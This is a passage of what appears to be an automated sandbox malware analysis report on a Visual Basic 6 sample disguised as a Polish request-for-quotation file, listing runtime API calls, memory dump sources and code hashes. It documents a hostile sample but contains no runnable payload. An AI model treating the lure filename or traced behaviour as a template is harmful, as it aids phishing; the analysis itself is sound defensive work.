                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,\\?\,00408114,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 00419FEE
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FF5
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A00C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A013
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A02B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A032
                                                                                                                                                                                                                                                      • #712.MSVBVM60(?,00409A70,00406544,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A047
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A04E
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A056
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041A077,?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A070
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$#712Move$CopyFree
                                                                                                                                                                                                                                                      • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                                                                                                                      • API String ID: 2546659950-1311169778
                                                                                                                                                                                                                                                      • Opcode ID: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                                                                                                                                                                                      • Instruction ID: d6e337f52aa0f406b5b9e7ae7ca613ada50fa9dc8b45b6b45c56035a55262318
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F213771B502197BCB00DB54CD82FEFBBB9AB54714F20422AB211B72E4DAB45D458ED4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$FreeMove$CopyUnlock$#616#631BstrErrorListSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1554985673-0
                                                                                                                                                                                                                                                      • Opcode ID: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                                                                                                                                                                                      • Instruction ID: babe0322a797a5b6fd9da037fd94c9e8bb3a8b55dbd2c7b94b419f711927b1e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A741A575A04114DFC724DFA4ED849EE77B9EF48300F10456BE505A3261DB785986CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                                                                                                                                                                                      • Instruction ID: 2258cb0996f04db46dac934d03965dd60a716a157fe6f4ee4cac8ab8ed0125e9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3ab2ae2adb5bb4c47874d4caa9ec11272c050c9bbc593e4460deddaa42495f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73316EB1A00119DFCB14DFA4ED84DEE7B79EF88300F50856AE506E3261DB385986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                                                                                                                                                                                      • Instruction ID: 1778df844528236c0a987ac4d2ed461284e935b427befae0ad271591413caba1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 246257148df8c58a63151417e2fa6cf9abfb38d00579c66028cbeba8a36e54a7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A13150B5A00119DFCB14DFA4ED84DEE7779EF88300F10856AE506E3261DB385986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
                                                                                                                                                                                                                                                      • Opcode ID: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                                                                                                                                                                                      • Instruction ID: f2cb84cfdc36a53c26a53c404fdd6523f55abe18ffc8f9b7dbfd1f77219752b6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36b3d8d5935acc63e5f9ea94afa97a512f975b8c77cc1bcf6976f7907015c398
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD315075A00119DFCB14DFA4ED94DEE7779EF88300B10456AE506E3261DB349986CF68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1701566546-0
